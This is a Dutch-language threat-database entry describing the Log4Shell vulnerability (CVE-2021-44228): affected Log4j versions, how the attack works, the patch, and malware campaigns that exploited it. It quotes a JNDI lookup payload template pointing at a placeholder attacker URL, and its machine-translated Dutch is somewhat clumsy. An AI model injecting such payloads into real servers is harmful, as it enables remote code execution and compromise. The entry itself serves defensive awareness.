Threat Database Vulnerability Log4Shell Vulnerability

Log4Shell Vulnerability

Op 10 december 2021 werd een exploit vrijgegeven voor een kritieke kwetsbaarheid in het op Java gebaseerde logging-platform van Apache Log4jpubliekelijk. Bijgehouden als CVE-2021-44228 of Log4Shell, heeft de kwetsbaarheid gevolgen voor Log4j-versies vanaf Log4j 2.0-beta9 en tot 2.14.1. Bedreigingsactoren kunnen profiteren van de exploit om niet-geverifieerde externe toegang tot stand te brengen, code uit te voeren, malwarebedreigingen af te leveren of informatie te verzamelen. De kwetsbaarheid krijgt een kritieke status omdat Log4j veel wordt gebruikt door bedrijfsapplicaties en cloudservices.

Log4Shell Technische details

De exploit begint wanneer de dreigingsactor de user-agent van hun webbrowser verandert. Vervolgens bezoeken ze een site of zoeken ze naar een specifieke string die aanwezig is op websites met het formaat:

${jndi:ldap://[attacker_URL]}

Als gevolg hiervan wordt de tekenreeks toegevoegd aan de toegangslogboeken van de webserver. De aanvallers wachten vervolgens tot de Log4j-toepassing deze logboeken parseert en de toegevoegde tekenreeks bereikt. In dit geval wordt de bug geactiveerd, waardoor de server terugbelt naar de URL die aanwezig is in de JNDI-string. Die URL wordt misbruikt om Base64-gecodeerde opdrachten of Java-klassen te verwerkenvervolgens en voer ze uit op het gecompromitteerde apparaat.

Apache bracht snel een nieuwe versie uit - Log4j 2.15.0, om de exploit aan te pakken en op te lossen, maar een aanzienlijk aantal kwetsbare systemen zou voor een lange periode ongepatcht kunnen blijven. Tegelijkertijd merkten bedreigingsactoren snel de Log4Shell zero-day kwetsbaarheid op en begonnen ze te scannen naar geschikte servers om misbruik van te maken. De infosec-gemeenschap heeft talloze aanvalscampagnes gevolgd die Log4Shell gebruiken om een breed scala aan malwarebedreigingen te leveren.

Log4Shell wordt gebruikt in cryptominer-, botnet-, backdoor- en gegevensverzamelingsaanvallen

Een van de eerste bedreigingsactoren die Log4Shell in hun operaties implementeerden, waren de cybercriminelen achter het Kinsing cryptomining -botnet. De hackers gebruikten Log4Shell om Base64-gecodeerde payloads te leveren en shellscripts uit te voeren. De rol van deze scripts is om het beoogde systeem te zuiveren van concurrerende cryptomining-bedreigingen voordat hun eigen Kinsing-malware wordt uitgevoerd.

Netlab 360 gedetecteerde bedreiging acteurs met behulp van de kwetsbaarheid voor versies van de installatie Mirai en Muhstik botnets op het geschonden apparaten. Deze malwarebedreigingen zijn ontworpen om geïnfecteerde systemen toe te voegen aan een netwerk van IoT-apparaten en servers, die de aanvallers vervolgens kunnen instrueren om DDoS-aanvallen (Distributed Denial-of-Service) te lanceren of crypto-miners in te zetten.hierop volgend.

Volgens het Microsoft Threat Intelligence Center was de Log4j-exploit ook het doelwit van aanvalscampagnes die Cobalt Strike-bakens lieten vallen. Cobalt Strike is een legitieme softwaretool die wordt gebruikt voor penetratietesten tegen de beveiligingssystemen van een bedrijf.Door zijn backdoor-mogelijkheden is het echter een gemeenschappelijk onderdeel geworden van het arsenaal van talrijke groepen bedreigingsactoren. Daarna wordt de illegale achterdeurtoegang tot het netwerk van het slachtoffer gebruikt om next-stage payloads te leveren, zoals ransomware, info-stealers en andere malwarebedreigingen.

Log4Shell kan worden misbruikt om omgevingsvariabelen te verwerven die servergegevens bevatten. Op deze manier kunnen aanvallers toegang krijgen tot de naam van de host, de naam van het besturingssysteem, het versienummer van het besturingssysteem, de gebruikersnaam waaronder de Log4j-service draait en meer.

Trending

Meest bekeken

Bezig met laden...